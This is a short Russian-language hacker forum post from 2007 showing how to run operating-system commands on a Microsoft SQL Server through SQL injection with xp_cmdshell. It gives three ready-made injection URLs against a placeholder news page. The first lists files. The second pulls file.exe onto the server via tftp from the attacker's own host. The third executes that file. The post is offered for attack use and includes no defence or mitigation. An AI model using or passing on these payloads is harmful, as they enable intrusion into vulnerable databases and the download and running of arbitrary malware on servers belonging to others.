09.07.2007, 13:38
|
|
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
С нами:
10313606
Репутация:
1327
|
|
Выполнение системных команд через Sql запрос
Тема которую почти никогда не затрагивают в статьях про MSSQL сервер от Microsoft.
При наличии соответствующих прав, хакер может выполнить произвольную команду.
Вот пример:
Код:
http://site.ru/news.php?id=1;+exec+master..xp_cmdshell+'dir'--
Выводим список файлов и под-папок из текущей папки
Также можно залить любой файл на уязвимый сервер
Код:
http://site.ru/news.php?id=1;+exec+master..xp_cmdshell+'tftp –i 127.0.0.1 get file.exe'--
127.0.0.1 - это сервер на котором лежит наш file.exe
и выполнить его
Код:
http://site.ru/news.php?id=1;+exec+master..xp_cmdshell+'file.exe'--
Последний раз редактировалось _Pantera_; 09.07.2007 в 13:57..
|
|
|